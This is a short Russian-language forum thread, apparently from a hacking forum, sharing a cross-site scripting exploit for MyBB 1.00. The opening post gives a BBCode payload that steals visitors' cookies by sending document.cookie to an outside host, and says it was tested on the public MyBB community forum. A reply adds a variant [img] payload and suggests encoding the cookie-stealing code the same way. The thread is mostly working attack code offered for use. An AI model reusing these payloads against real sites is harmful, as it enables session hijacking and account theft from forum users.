![]() |
XSS в MyBB (MyBulletinBoard 1.00)
Эксплоит
Код HTML:
[url=" style=`background:url(javaS cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]Проверялось в форуме http://mybboard.com/community/ |
Excellent ! :)
ThX Algol |
Спасибо, но мне кажется я гдето это видел... а не на секьюри?
|
Цитата:
Кстати если написать вот так, Код HTML:
[img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');Строку, Цитата:
http://ha.ckers.org/xss.html Там где говориться Цитата:
Будет это все выглядеть типа вот так, Код HTML:
[img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');Код для воровки кук, можно взять от Алгола и так же его закодировать. :rolleyes: |
| Время: 18:48 |